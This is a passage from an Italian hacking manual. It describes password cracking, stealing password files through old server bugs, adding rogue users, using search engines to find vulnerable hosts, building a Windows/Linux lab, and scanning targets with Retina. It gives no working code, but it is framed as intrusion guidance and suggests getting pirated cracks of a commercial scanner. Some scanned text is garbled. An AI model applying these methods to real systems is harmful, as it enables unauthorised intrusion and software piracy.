questo non è vero. 

Tali individui al fine di fare ripicche da 4 soldi nei confronti di altri ragazzi hanno manomesso 
dei sistemi informatici inserendo dentro ai files di LOG i dati di questi ultimi. 
Ora ditemi se da persone di questo tipo ci si potrebbe attendere un uso sensato di 
metodologie il cui scopo è quello di creare dei crash di sistema. 

Fortunatamente queste persone hanno grosse convinzioni di possedere molta intelligenza 
quando di fatto questa è supportata solo da un esagerato senso di arroganza nei confronti del 
prossimo. 

Un altro tipo di hacking è legato all'individuazione delle password utilizzate nei vari processi 
come ad esempio quello di login dentro a qualche sistema come quelli Unix. 
Queste tecniche utilizzano dei sistemi che tentano di individuare le password mediante due 
metodi fondamentali e precisamente quello in cui le password vengono attinte dea un 
database già precostituito mentre il secondo metodo invece compone le password con 
sistemi più o meno sequenziali. 

Questo ultimo metodo diventa utilizzabile solo con a disposizione un tempo che può essere 
anche enorme dato che passwords con più di 6 o 7 caratteri possiedono miliardi e miliardi di 
combinazioni possibili per cui anche con un calcolatore potentissimo l'elaborazione potrebbe 
pretendere giorni se non settimane. 

Sempre ammesso che il sistema permetta più di un certo numero di tentativi. 

Quando ci si ha a che fare con reti molto grosse nelle quali sono connesse delle intranet 

l'hacking potrebbe essere perpetuato anche dall'interno delle società stesse. 

In questo caso l'individuazione di certe password di amministrazione potrebbero essere 

anche frutto di uno sniffing dei segmenti interni di rete. 

Ulteriore metodo di hacking è legato all'uso di backdoor che spesso sono collegati a dei virus. 
Ne è un esempio nimbda il quale sfruttando un problema legato al controllo trasversale in 
Windows ha insegnato la tecnica per installare delle backdoor. 
Non parliamo di sistemi come NetBus e Back Orifice 

Questi tipi di software sono stati tralasciati in quanto il fatto di andare ad installare un 
programma su un sistema remoto lo trovo stupido dato che la maggior parte degli antivirus 
riconoscono questo tipo di software ed essendo pacchetti che necessitano di installazione a 
questo punto non capisco perché uno non possa al loro posto inserire un utente abusivo. 
Chiaramente il fatto di eseguire un certo tipo di tentativi per accedere al sistema vittima non 
significa che la persona che lo applica di fatto usi solo quello. 

Gran parte del lavoro viene fatto in fase d'analisi, ovvero quella fase che precede l'attività 
d'intrusione vera e propria. 

Il discorso delle password in ogni caso può essere considerato come un concetto chiave 
dell'hacking in quanto qualsiasi attività svolta su una rete alla fine possiede qualche sistema 
di autenticazione che si supporta su un riconoscimento. 

L'individuazione delle passwords può anche essere visto come un attività progressiva in 
quanto non esiste soltanto l'accesso immediato ad un certo livello ma anche quello che 
potrebbe essere definito come "scalata dei livelli". 

L'hacking rivolto all'individuazione diretta di una password potrebbe essere, ad esempio, 
quella praticata su un login di un sistema Unix. 

In questo caso un certa utility potrebbe eseguire un certo numero di tentativi basandosi su 
una creazione computativa delle passwords stesse o mediante dizionario e quindi di fatto 
individuare il codice d'accesso ad un sistema. 

Un'altra tipologia di hacking in ogni caso potrebbe essere quello che si svolge tranquillamente 
a casa propria su di un sistema simulato. 

Supponiamo di non essere riusciti ad entrare in un sistema ma in qualche modo di essere 
riusciti a prelevare i files delle passwords. 

Questo potrebbe essere fatto mediante qualche strano BUGS come UNICODE o mediante 
qualche problema di protocolli come FTP. 

Una volta in possesso dei files interessati a gestire gli accessi ad un sistema questi 
potrebbero essere inseriti su di un nostro computer sul quale verrebbe tenuto in funzione un 
qualche Utilities indirizzata alla decodifica dei records d'accesso. 
In questo caso l'hacking diventa quasi un lavoro da cracker. 
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Quante volte un amministratore di sistema si dimentica di eliminare un utente guest dal 
proprio OS ? 

Chiaramente questo tipo di utente non possiede livelli tali da permettere modifiche sostanziali 
al sistema operativo ma di fatto potrebbe permettere di visualizzare i vari files passwd, SAM 
ecc. 

Il tipo d'hacking svolto dalle persone che dispongono di notevoli capacità di programmazione 
e di uso di certi software come disassemblatori e debuggers è sicuramente quello più 
produttivo. 

Questo è il motivo per cui in questo volume l'aspetto della programmazione è stato tenuto nin 
primo piano. 

Il fatto di riportare i sorgenti di moltissimi software possiedono come significato quello di 
cercare di portare ad una famigliarità la persona che legge questo volume su quelli che 
potrebbero essere gli strumenti fatti in casa. 

Chiaramente spesso le utlities che potete trovare in giro, magari costosissime, potrebbero 

essere esageratamente più potenti di certi sorgenti che potrete trovare qui. 

Il fatto di avere la mano a trattarli come sorgenti significa spesso metterne insieme più di uno 

per arrivare a possedere software più mirati alla risoluzione di certi problemi specifici. 

Lo Script Kiddie usa soltanto i programmi che si trovano sulla rete senza preoccuparsi di 

come questi funzionino. 

Ricordiamoci che questi sorgenti potrebbero portarvi ad avere un bricciolo di confusione 
mentale vista la varietà dei sistemi opeativi a cui sono orientati. 

Non fatevi confondere in quanto indipendentemente dal OS a cui sono destinati il loro 
funzionamento è sempre lo stesso ovvero basato su SOCKET i quali sia sotto Windows che 
sotto Unix funzionano sempre allo tesso modo. 

I sockets vengono inizializzati, aperti e usati per leggere e scrivere dati verso e dal sistema 
host usato come destinazione. 

II tipo di hacking dinamico perevede la famigliarità con questi sorgenti. 

Prima di passare al livello superiore del creativo, cercate nel limite del possibile, di usare un 
utility che dovrete compilare e solo successivamente utilizzare. 

Npon andate sempre alla ricerca del programma fatto la cui unica difficoltà è quella di lanciare 
il setup. 

Ricordatevi sempre questo : 

I SORGENTI DELLE UTILITIES DESTINATE ALL'HACKING QUASI MAI POSSIEDONO 
COMPLICAZIONI ALGORITMICHE PARTICOLARI. TUTTE SI BASANO SU SOCKET IL 
CUI MECCANISMO D'USO E' SEMPLICE. SE DEVETE FARE UNA FUNZIONE 
PARTICOLARE, COME AD ESEMPIO UNO SCANNING, COMPILATE UN SORGENTE, E 
UASANDO UN DEBUGGER CERCATE DI SEGUIRE QUELLO CHE FA. IL DEBUGGER VI 
PERMETTERÀ' DI VEDERE I DATI DENTRO ALLE STRUTTURE E IL FATTO DI 
ANIPOLARE QUESTE VI FARA' AVERE UNA FAMIGLIARITÀ' CHE DI FATTO E' IL 
GRADINBO ANTECEDENTE A QUELLA DELL'HACKER CREATIVO OVVERO QURELLO 
CHE CREA LE SUE UTILITY. RICORDATEVI CHE SPESSO LE PERSONE CHE HANNO 
IMPARATO A PRORAMMARE INIZIALEMENTE HANNO SEGUITO I PROCEDIMENTI DI 
PROGRAMMI FATTI DA ALTRI. 

Chiaramente a certi livelli l'hacking possiede una forma sperimentale. 
Questo significa che quando arriverete ad avere dimestichezza con la programmazione e con 
i disassemblatori, il fatto di riuscire ad individuare qualche buffer overflow non sarà un regola 
precisa ma in ogni caso deriverà da infinite ore di prove e di test. 

Quando mi è venuto in mente di scrivere questo volume ho voluto vedere le varie facce 
dell'hacking trattate da altre persone che avevano scritto volumi di grosso successo. 
Tra questi c'era : 

Hack Attacks Revealed 
Hacking Exposed 

Windows 2000 - Hacking Exposed 
Linux - Hacking Exposed 
Linux - Massima sicurezza 

La sfaccettature che scaturivano erano completamente differenti. 
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Chinilo, quello del primo volume, aveva afferrato, a mio modesto parere, l'aspetto giusto 

ovvero quello di mostrare le varie utility da utilizzare partendo dai sorgenti di questi. 

Al contrario gli altri volumi trattavano le utilties ma senza mai fare riferimento al codice di 

questi. 

Sempre l'autore del primo volume ha riportato anche una grossa fetta di questo riferendola ai 
problemi della programmazione trattando la teoria del linguaggio C. 

Tra tutti i volumi era sicuramente quello che si avvicinava di più alla mia idea in quanto gli 

altri, put essendo più recenti come concetti, trattavano solo l'uso di certi programmi. 

Come abbiamo detto prima, quando si legge un volume in cui si vede che il metodo XXX 

viene eseguito inviando all'host di destinazione un flusso di SYN, probabilmente non si riesce 

a capire praticamente in cosa questa metodologia consiste dal punto di vista pratico. 

Il fatto di avere a disposizione un sorgente significa guardare e seguire passo a passo quello 

che questo fa , metodo che di fatto è un ottimo aiuto nella comprensione del metodo stesso. 

Lo so di essere noioso quando ripeto l'invito di usare si le utility già fatte ma nel limite del 

possibile cercate sempre di dare un occhiata ai sorgenti di qualche pacchetto che fa quelle 

cose. 

Sforzatevi e vi accorgerete che senza accorgervi vi troverete ad avere una dimestichezza 
nella verie funzioni possibili che prima non speravate di poter raggiungere. 
Se questo volume potrà mai insegnarvi qualche cosa probabilmente lo farà mediante l'analisi 
dei sorgenti. 



La ricerca delle informazioni. 

Quando nel 1984 decisi di mettere sul biglietto da visita 'Consulente in Informatica' feci la 

scoperta di quanto quest'attributo è scomodo e spesso pesante da sopportare. 

Se su un biglietto da visita ci scrivi 'Parucchiere' significa che tu in qualche modo svolgi un 

attività che ha a che fare con il taglio dei capelli e quindi tagliali cosi o tagliali in un altro modo 

ma in ogni caso le cose non sono poi così tanto differenti. 

Consulente in Informatica vuole dire TUTTO ! 

Infatti fare un consulenza in materia d'informatica significa adattare un sistema informatico a 
lavorare con un determinato universo con il quale questo dovrà colloquiare ed eventualmente 
controllarlo. 

Un giorno vi potrebbe squillare il telefono e dall'altra parte potrebbe esserci la Storditi & C. 
che vi potrebbe chiedere di creargli un programma per analizzare lo stato mentale degli 
associati per valutare l'idoneità alla partecipazione al loro CLUB oppure la Cerebrolesi & C. 
che vorrebbe automatizzare la produzione delle loro protesi neurali. 

Anche se probabilmente non avrete mai avuto a che fare con quella problematica dovrete 
cercare di documentarvi il più velocemente possibile per riuscire ad adempiere all'incarico 
che avete accettato. 

Questo fu il problema che mi spinse nel 1985 a fondare con altri la FidoNet italiana in quanto 
l'idea era che da qualche parte ci potessero essere le persone che avevano già affrontato I 
problemi a cui eri sottoposto per motivi di lavoro per cui la cosa importante era quella di 
possedere un mezzo per permettere a più persone di collegarsi e di dialogare in relazione ad 
un interesse comune. 

Con il passare degli anni le tecnologie si sono evolute e internet è diventato il serbatoio del 
sapere mondiale per cui la capacità di apprendere è anche diventata legata alla capacità di 
riuscire ad individuare le informazioni giuste nel modo più veloce possibile. 
Normalmente le ricerche in rete vengono eseguite usando un motore di ricerca quale ad 
esempio Altavista o Yahoo. 

Personalmente non lo ritengono il migliore dei metodi in quanto l'argomento hacking, cracking 
ecc. spesso viene radiato da molti motori di ricerca per cui una ricerca ottimale dovrebbe 
essere eseguita su più motori. 

In questo caso sorgerebbero dei problemi in quanto inviando su più motori in tempi diversi si 
correrebbe il rischio di reperire diverse volte la stessa pagina oppure di trovare pagine che di 
fatto non centrano molto con gli argomenti cercati. 

In circolazione esistono software come ad esempio Copernic che svolgono le seguenti 
operazioni : 



1 adattano la sintassi ai motori 
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3 convogliano le risposte 

4 le analizzano, controllano I links e ordinano le risposte in base all'importanza dei termini 
ricercati 

5 permettono la navigazione senza uscire della tabella dei risultati 



Esistono diversi programmi come ad esempio : 



Copernic 


- Free - http://www.copernic.com 


BullsEye 


- Free 


PgWEB 


- Free - Prodotto italiano 


Bingooo 


- Free - http://www.bingooo.com 



Esiste il solito motore di ricerca UNDERGROUND che tutti conoscono, ovvero : 



http://www.astalavista.com 
http://astalavista.box.sk 

ma questo è per lom più indirizzato alla ricerca di programmi di crack anche se di fatto molti 
sistemi che trattano il cracking poi di fatto trattano anche l'hacking. 

In ogni caso tutto il discorso era indirizzato al fatto che quando necessitate di qualche 
informazione potrete trovarlo usando i sistemi di ricerca appena citati, 
lo di natura ho sempre la tendenza ad esagerare per cui quando cerco un argomentazione 
uso tutti i sistemi in quanto questi usano spesso motori differenti per cui se si vuole la 
sicurezza di trovare quasi tutto quello che è relativo ad un argomento diventa necessario 
formulare le ricerche con tutti i programmi. 

In ogni caso tra i 4 Copernic è sicuramente quello migliore in quanto gli altri utilizzano i loro 
BROWSER interni per fare navigare sui risultati mentre questo mostra una dialog, sempre in 
primo piano, dove dentro ci sono i pulsanti che controllano lo scorrimento delle pagine dentro 
al nostro browser di default. 

Funzioni aggiuntive possono essere svolte sulle interrogazioni come ad esempio il test delle 
pagine trovate per evitare di cercare di connettersi a siti che di fatto non sono più 
raggiungibili. 

Gli argomenti dell'hacking sono di una vastità incredibile per cui avere a disposizione un buon 
programma di ricerca è di fatto essenziale. 

Moltissime argomentazioni legate alla rete sono definite dentro a quelli che vengono chiamati 
file RFCxxxx. 

Qualsiasi protocollo possiede la sua definizione dentro a questi files i quali vengono 
considerati come standard. 

Se ad esempio desiderate vedere la definizione del protocollo DNS il dovrete andare sul 
sistema che gestisce gli archivi di questi files e ricercare quello adatto. 
Nella versione su CD di questo volume viene fornito un archivio contenente la maggior parte 
di questi files. 

Non sono sicuramente parole sciupate quelle legate al fatto di dire, ripentendolo, che l'attività 
dell'hacker si può riassumere con il fatto che questo è un individuo in grado di analizzare il 
sistema vittima ed in base all'analisi fatta capace di individuare, o al limite di creare, il tipo di 
exploit adatto ai sistemi operativi ed ai software di gestione dei servers che questi sistemi 
utilizzano. 

Quando andiamo a utilizzare software come RETINA, questi in fondo alla lista dei problemi 
individuati mostra un link alla pagine dove viene descritto il problema e se esiste [exploit. 
Questo significa che una grossa capacità dell'hacker deve essere quella di riuscire ad 
individuare le caratteristiche di un sistema e quindi di ricercare gli exploits adatti. 
Caricate COPERINIC e digitate come stringa di ricerca : 

"exploits hacker database" 

e guardate la lista dei siti che riportano gli elenchi di questi exploits. 
Sul sistema : 

http://icast.nist.gov 
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viene riportato un archivio ACCESS con dentro i dati dei vari problemi con OS e servers, e le 
procedure per le ricerche su questi , utilizzabile gratuitamente. 



M ICAT Welcome Page 







Open the ICAT Vulnerability Database 

Open the ICAT Vulnerability Database to 
edit old vulnerability data and add new 
vulnerabilities. 



Open the ICAT Maintenance Form 

Open the ICAT Maintenance Form to format 
ICAT for export, compact and repair the 
database, add publish dates to new entries, 
and convert old CAN entries to CVE entries. 



isiist 



icat.nist.gov 



All'interno del database esiste la procedura di gestione per eseguire interrogazioni. 



*'*t+..'-ì |fr-^"«i F^iyjii £«i>o fr^m, ; 



v -:-J- ■■■■ 

f fèlli.' F,..K[i 1 
fiHflWVF.MKb.l 1 




Prima di decidere qualsiasi altra strada ricercate sempre sulla rete per vedere se esiste già 
qualche cosa di fatto anche se chiaramente questo riduce la percentuale di probabilità che 
l'attacco riesca. 
Perchè ? 

Beh, questo mi pare chiaro. 

Se un bugs sono due anni che è in giro allora le probabilità che si siano messe delle pezze al 
problema sono più elevate rispetto ad un tipo di exploits che sono pochi giorni che è stato 
pubblicizzato. 

Ricordiamoci che le tecniche attive come quelle legate ai buffers overflow servono appunto 
alla ricerca di problemi non conosciuti. 

I motori di ricerca possono essere anche utilizzati per l'individuazione di sistemi adatti 
all'utilizzo di certe tecniche. 
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Esistono certi exploits o certe tecniche che pretendono che i sistemi presi di mira possiedano 
certe caratteristiche come ad esempio quelle relative a certi percorsi. 
Portiamo ad ad esempio : 

c:\winnt 
c:\inetpub 

TSWeb\default.html 

Alcune volte questi percorsi sono riportati dentro a delle pagine HTML per cui l'uso di sistemi 
di ricerca potrebbero portare all'individuazione dei sistemi adatti. 

Alcuni software di creazione delle pagine html riportano come TITOLO (<title></title>) il 
percorso di dove sono piazzate le pagine WEB. 

FRONTPAGE ad esempio inserisce il path completo delle pagine che crea. 

Quindi ricordiamoci che i motori di ricerca possono essere utili per l'individuazione degli 

argomenti che ci interessano ma lo sono anche per la ricerca di certe caratteristiche dei siti. 



L'ambiente di lavoro 

Ora dobbiamo vedere come strutturare l'ambiente di lavoro. 
Generalmente si usa Windows o al suo posto Linux. 

In questo volume molti software sono relativi al primo tipo di ambiente mentre molti altri sono 
riferiti al secondo tipo. 

Chiaramente l'ambiente Linux è quello ideale in quanto tutto è già incluso comprese diverse 
librerie legate alla programmazione di rete le quali si supportano su determinate estensioni 
del kernel stesso. 

Usando l'ambiente Windows dovrete disporre di tutti i softwares e di tutti i linguaggi utilizzati. 
Prendiamo come esempio i sorgenti scritti in linguaggio C. 

Questi per essere messi in funzione devono essere compilati con uno dei compilatori presenti 
in questo ambiente. 

Molti di questi sources si riferiscono a Visual Studio di Microsoft anche se di fatto quasi tutti i 
programmi, gestendo funzoni di rete, potrebbero essere trasportati in qualsiasi ambiente 
grazie a poche funzioni di libreria, ad esempio relazionate ai sockets. 
Linux dispone già al suo interno del compilatore sia C che C++. 
Un altro esempio è relativo allo sniffing dei segmenti di rete. 

Per svolgere queste funzioni si deve reperire programmi come ad esempio COMMVIEW. 
L'ambiente Linux per tali funzioni possiede già al suo interno di softwares come ad esempio 
TCPDUMP. 

Senza contare le numerosissime librerie come TCP capture e altre. 

In ambiente Windows dovrete andarvi a cercare WINCAP che pur comunque essendo 
gratuito è pur sempre un pacchetto esterno che deve essere 9 installato sulla macchina di 
lavoro. 

Chiaramente per chi inizia Linux è una complicazione aggiuntiva in quanto già solo a livello 
d'installazione questo non è poi cosi immediato come potrebbe esserlo Windows. 
Come gestire tutti e due gli ambienti su di un unico computer ? 
Nulla di più semplice. 

Per prima cosa dovrete preparare il disco in modo tale che questo possieda a livello di spazio 
quello sufficiente per gestire le due partizioni de sistemi operativi Windows e Linux. 
Se avete già tutto istallato potrete sempre supportarvi su programmi come PARTITION 
MAGIC per ridimensionare le partizioni esistenti in modo tale da installargli anche il nuovo 
sistema operativo. 

Rimane chiaro che potreste decidere di mantenere solo Linux o solo Windows e quindi di 
adattare i software anche sostituendoli con altri trovati in rete con funzioni uguali o simili. 
Un'altra soluzione molto valida è quella di utilizzare sotto Windows o sotto Linux un software 
chiamato VMVARE (prelevabile da http://www.vmware.com ) esistente per tutti e due gli 
ambienti, ilil quale riesce a creare dentro allo spazio fisico riservato al sistema operativo 
primario già installato, uno spazio in cui inserirà il nuovo OS. 

In altre parole è possibile grazie a questo pacchetto fare girare dentro ad una finestra un 
sistema operativo differente da quello già presente. 

Questo software permette anche di mantenere sotto Windows 2000 altre versioni di Windows 
come ad esempio WIN98, WIN ME e WIN XP. 
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Al momento dell'installazione Vmware richiede la natura del sistema operativo che si intende 
inserire all'interno del nuovo sistema. 

La filosofia di tale programma è quella della creazione di macchine virtuali un pò come 

capitava in certe versioni di sistemi operativi indirizzati ai mainframe un po' di anni fa. 

La gestione di tali macchine virtuali è talmente precisa che quando si apre una finestra in cui 

il sistema operativo ospite viene eseguito, nello spazio di output di questa viene visualizzata 

la sequenza di bootstrap con tanto di test della memoria e di lettura del bios, esattamente 

come avviene all'istante dell'accensione della macchina stessa. 

Le ultime versioni di Vmware supportano anche sistemi operativi come Windows XP. 

Questa tipologia di gestione in ogni caso è possibile eseguirla anche in ambiente Linux. 

In questo caso nella finestra visualizzata girerebbe Wndows e non più viceversa come nel 

primo caso. 

Riassumendo quanto detto fino a questo punto possiamo dire che se si è optato per l'uso di 
Linux allora Wndows potrebbe essere essere considerato come un OS secondario. 
Quale distribuzione scegliere di Linux ? 

Lasciamo perdere l'ultima ovvero quella chiamata Lindows, o meglio quella che in teoria 
dovrebbe permettere l'esecuzione di programmi Windows in ambiente Linux, in quanto 
questa è troppo prematura per il tempo in cui è stato scritto questo volume. 
A mio modesto avviso una delle migliori distribuzioni di Linux rimane la REDHAT la quale 
nella versione di base costa poche decine di euro. 

In questa distribuzione esiste anche una grossa chiamata SERVER la quale è costituita da 
circa 16 CD ma nel nostro caso è esagerata in quanto è indirizzata alla gestione di servers di 
rete e non sicuramente a installazioni casalinghe di Linux. 

Come dicevamo prima in questo caso abbiamo già tutto dentro per cui non dovremo 
diventare pazzi a cercare programmi in giro. 

I compilatori dovranno essere quelli del C/C++ come ad esempio gcc. 

Dovrete fare solo attenzione al fatto che questi vengano installati, a parte il fatto che in ogni 
caso potrette sempre farlo in un tempo successivo, mediante la specifica delle apposite 
opzioni. 

Nel setup di REDHAT dovrete dirgli che desiderate includere i sistemi di sviluppo. 

Alcuni linguaggi a aprte come ad esempio JAVA o PERL dovranno essere prelevati dai loro 

siti ed installati. 

II metodo più semplice è sicuramente, quando possibile selezionarlo, costituito dagli RPM. 
Una volta portato il file .RPM in una delle directory del sistema operativo, per installarlo sarà 
sufficiente, nella maggior parte dei casi, dare il comando : 



Parlando sempre di Linux vi consiglio di scegliere l'installazione formato server in modo tale 
che vengano compresi anche i vari programmi server come ad esempio Apache i quali vi 
verranno utili per fare prove locali senza dover sempre agire connessi in rete. 
Passando all'ambiente Windows potrete scegliere diversi compilatori anche se di fatto quello 
Microsoft è quello usato in quasi tutti gli ambienti. 

Le versioni in circolazione sono tre e precisamente la versione 5.0, la 6.0 ed infine quella 
appena uscita ovvero Visual Studio .NET v7.0. 

L'ambiente Microsoft dispone di una particolarità che lo rende molto appetibile. 
Come tutti sapranno Windows può essere considerato come un insieme di N strati operativi 
ciascuno dei quali dispone di caratteristiche tali da renderlo particolar, mente indicato per lo 
sviluppo di certi applicativi software. 

La Microsoft stessa ogni sei mesi circa rende pubblico un CD con sopra tutti gli SDK relativi 
all'ambiente Windows. 

Perché andare a cercare su questo CD determinate cose ? 

Per fare un esempio possiamo attenerci a quello che è il meccanismo della sicurezza locale 
di Windows. 

Alcune informazioni vistali per il sistema vengono memorizzate dentro a certi files come ad 
esempio il sistema delle password le quali vengono memorizzate come hash dentro al file 
SAM. 

Per andare ad attingere certi dati da questi files di sistema si potrebbe utilizzare delle funzioni 
di letura RAW e inserire dentro alle strutture descrittive dei dati le informazioni acquisite. 
All'interno dei files SDK esiste un libreria destinata alla gestione della Locai Security. 
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Mediante queste funzioni è possibile analizzare e gestire questo meccanismo. 
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Lo stesso dicasi per qualsiasi altra cosa come ad esempio le funzioni per la gestione della 
rete, per quelle delle MAPI. 

Questo che segue è soltanto il listato di tutti i files di HELP presenti nel SDK Microsoft di 
Agosto 2001 . 



Volume in drive F is VSENTD1 
Volume Serial Number is 449A-C016 



Directory of F: \Microsoft SDK\Help 



[■] 

apeompat . ehm 
CdoSys . Chi 
ComDev. Chm 
dhcp . chi 
DllProc. Chm 
dx8_vb . chi 
eap . chm 
Gdi . Chi 
Hardware . Chm 
HTMLTel . Chm 
ics . chi 
IndexSrv . Chm 
Ipc . Chi 
ir da . chm 
MDACSdk . Chi 
Midi . Chm 
MsAgent . Chi 
Mscs . Chm 
Mts.Chi 
netbios . chm 
NetMgmt . Chi 
netpsup . chm 
OleDb.Chi 
pchealth . chm 
Policy. Chi 
Rpc . Chm 
sapi . chi 
script56 . chm 
Security . Chi 
ShellCC.Chm 
snmp . chi 



[■■] 

Automat . Chi 
CdoSys . Chm 
CosSDK. Chi 
dhcp . chm 
dns . chi 
dx8_vb. chm 
fax . chi 
Gdi . Chm 
help.txt 
Ias . Chi 
ics . chm 
Inet . Chi 
Ipc . Chm 
madcap . chi 
MDACSdk . Chm 
Mmc . Chi 
MsAgent . Chm 
Msi . Chi 
Mts. Chm 
NetDir.Chi 
NetMgmt . Chm 
netsh . chi 
OleDb . Chm 
PerfMon . Chi 
Policy. Chm 
Rras . Chi 
sapi . chm 
SDKintro .Chi 
Security. Chm 
Sms . Chi 
snmp . chm 



ado210 .chi 
Automat . Chm 
Com . Chi 
CosSDK. Chm 
die. chi 
dns . chm 
dxmredir . chi 
fax . chm 
gdiepp. chi 
HelpLib . Chi 
Ias . Chm 
IisRef. Chi 
Inet . Chm 
IpubSDK. Chi 
madcap . chm 
memory . chi 
Mmc. Chm 
mschap . chi 
Msi . Chm 
Multimed. Chi 
NetDir. Chm 
NetMon . Chi 
netsh . chm 
OpenGL . Chi 
PerfMon . Chm 
Qos . Chi 
Rras . Chm 
sbscs . chi 
SDKintro . Chm 
SetupAPI .Chi 
Sms . Chm 
sr . chi 



ado270.chm 
bits . chi 
Com . Chm 
Debug . Chi 
die. chm 
dx8_c. chi 
dxmredir . chm 
FilelO.Chi 
gdiepp. chm 
HelpLib . Chm 
lem . Chi 
IisRef. Chm 
Intl . Chi 
IpubSDK. Chm 
MAPI . Chi 
memory. chm 
Msaa . Chi 
mschap . chm 
Msmq. Chi 
Mul t imed . Chm 
NetMeet . Chi 
NetMon . Chm 
Odbc.Chi 
OpenGL . Chm 
platsdk. chw 
Qos . Chm 
rtcclnt . chi 
sbscs . chm 
sdo . chi 
SetupAPI .Chm 
SmtpEvt . Chi 
sr. chm 



apeompat . chi 
bits . chm 
ComDev. Chi 
Debug. Chm 
DllProc . Chi 
dx8_c. chm 
eap. chi 
FilelO.Chm 
Hardware . Chi 
HTMLTel . Chi 
lem. Chm 
IndexSrv . Chi 
Intl . Chm 
ir da . chi 
MAPI. Chm 
Midi . Chi 
Msaa . Chm 
Mscs . Chi 
Msmq. Chm 
netbios . chi 
NetMeet . Chm 
netpsup . chi 
Odbc . Chm 
pchealth . chi 
platsdk. col 
Rpc . Chi 
rtcclnt . chm 
script56 . chi 
sdo . chm 
ShellCC.Chi 
SmtpEvt . Chm 
StillImg.Chi 
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TAPI . Chi 


TAPI. Chm 


TaskSchd. Chi 


TaskSchd . Chm 


Tcplp . Chi 


Tcplp . Chm 


TermServ. Chi 


TermServ. Chm 


Tools . Chi 


Tools. Chm 


tsf. chi 


tsf. chm 


upnp . chi 


upnp . chm 


wfp . chi 


wfp . chm 


Wia . Chi 


Wia . Chm 


Win32 . Chi 


Win32 . Chm 


Win 6 4. Chi 


Win 64 . Chm 


Win9xMig. Chi 


Win9xMig . Chm 


WinSock . Chi 


WinSock . Chm 


Winui . Chi 


Winui . Chm 


Wizard. Chi 


Wizard. Chm 


wmencode . chi 


wmencode . chm 


wmform . chi 


wmform . chm 


WMISDK. Chi 


WMISDK. Chm 


wmplay. chi 


wmplay. chm 


WMRM.Chi 


WMRM.Chm 


wmsrvsdk . chi 


wmsrvsdk . chm 


Wnet . Chi 


Wnet . Chm 


Wp . Chi 


Wp. Chm 


xmlsdk. Chi 


xmlsdk . Chm 






211 File(s) 


153.435.911 bytes 





Come potete vedere esistono help legati alle Policy, al management di rete, ai WinSockets e 
cosi via. 

Il tutto è una fantastica fonte di informazioni che chiunque dovrebbe disporre. 



Hacking 

A questo punto abbiamo creato le basi necessarie per iniziare il discorso sull'hacking vero e 
proprio e quindi possiamo iniziare a vedere a fondo le tecniche per l'esecuzione di alcune 
metodologie particolari. 

Quelli che generalmente sono definiti con il termine di hacker in effetti sono appartenenti a 
diverse categorie differenti le quali si differenziano tra di loro a seconda del livello di 
conoscenze che questi hanno. 

Il primo tipo è costituito dagli SCRIPT KIDDIE i quali possiedono come caratteristiche 
fondamentali le seguenti : 

• Non possiedono molte conoscenze 

• Hanno una cultura relativa alle reti ed ai sistemi operativi superficiale 

• Prelevano da internet programmi per creare attacchi dei quali non conoscono il 
funzionamento 



Il secondo tipo sono quelli definiti come ATTACANTI INTERMEDI i quali a sua volta 
possiedono le seguenti caratteristiche : 

• Conoscenze un poco più elevate dello SCRIPT KIDDIE 

• Hanno qualche conoscenza di Unix, delle reti e sui protocolli 

• Molti di questi non sono in grado di identificare nuovi bugs dei software e delle reti 

L'ultimo tipo è quello definito come ATTACCANTI ESPERTI i quali possiedono : 

• Attingono le loro conoscenze da attività che svolgono legate al settore 

• Sono in grado di identificare bugs dei software e delle reti e per sfruttare questi sono in 
grado di scrivere i software 

• Moltissime volte scoperti i bugs non frodano le leggi ma al contrario aiutano i sistemisti a 



Come abbiamo visto in queste descrizioni una cosa che risalta è il fatto che quasi sempre le 
attività svolte dagli hackers sono legate al fatto di scoprire e sfruttare dei bugs presenti nei 
sistemi operativi o nei softwares di gestione dei servers che girano sui vari hosts. 
La scoperta di bugs deve avvenire, come abbiamo detto prima, grazie all'analisi che viene 
fatta sui software mediante l'uso o mediante il disassemblaggio di questi come nel caso dei 
vari buffers overflow. 

In generale comunque, lasciando a parte per il momento i casi avanzati, le metodologie per 
trovare i metodi per accedere ad un sistema seguono quasi sempre un determinato 
procedimento. 

La prima procedura in ogni caso è quella che include tutti i metodi necessari a individuare gli 
hosts idonei all'applicazione di certi metodi. 
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Questo in parte viene eseguito mediante quelle che sono definite come procedure di 
SCANNING le quali vengono svolte con programmi particolari in grado di prendere in input un 
certo range di IP e quindi, mediante scansione, di identificare le porte aperte su ciascuno di 
questi. 

Il fatto di identificare degli hosts legati a certi IP è solo un primo passo verso l'identificazione 
di quelle che è l'inseme delle proprietà che identifica ciascuno di questi. 
Gli host in genere possono avere su determinati sistemi operativi con attivi certi servizi e oltre 
a questo possono far girare diversi software relativi a servers vari del tipo dei mail servers, 
web servers ecc. 

Come abbiamo già detto ciascuno di questi potrebbe possedere determinati bugs i quali 

potrebbero essere sfruttati per entrare nel sistema. 

Per ora parliamo solo di bugs senza vedere come è possibile crearli. 

Esistono diverse case come ad esempio la EEYE che sviluppano software particolari utilizzati 
da system admin per testare i propri sistemi i quali sono in grado di eseguire centinaia di test 
orientati al'identificazione dei vari problemi. 

Un di questi è RETINA il quale dispone di diverse funzionalità tra cui quella dello SCANNER. 

Questo è veramente potente in quanto è in grado di identificare decine e decine di possibili 

bugs indicando oltre a questo il sito e la pagina dove è possibile avere ulteriori informazioni 

compresi i test per verificare la pericolosità, gli exploits possibili e le soluzioni. 

Il fatto di utilizzare RETINA è sicuramente uno dei metodi migliori per avere certe 

informazioni evitando di dover eseguire ad uno ad uno determinati test. 

Inoltre le case produttrici di fatto mantengono aggiornati tali software che tra l'altro 

possiedono costi non indifferenti e quindi di fatto il loro uso è spesso legato al reperimento dei 

cracks idonei su siti come Astalavista. 

Retina svolge diverse attività tra cui quella definita come SCANNER la quale esegue 
sequenzialmente tutte le attività che vanno dall'identificazione del dominio, se possibile la 
versione del sistema operativo, testa le porte aperte, verifica su queste la presenza di tutti i 
bugs conosciuti e archiviati in quella versione relativi al software identificato che gestisce ogni 
specifica porta, verifica la presenza di CGI e cosi via restituendo alla fine un rapporto molto 
dettagliato relativo alle informazioni individuate. 

L'identificazione del sistema operativo e dei vari software che girano atti a gestire i vari WEB 
Servers, i servers FTP, quelli EMAIL ecc. è sicuramente una delle attività fondamentali e che 
in ogni caso deve precedere qualsiasi altro tipo di analisi rivolto ad un sistema. 
A dire il vero ancora prima sarebbe utile individuare il tracciamento del sito ovvero la catena 
di segmenti di rete che dobbiamo percorrere per giungere a quel determinato sistema. 
Questo tipo di funzione possiamo eseguirla tramite un normale programma come ad esempio 
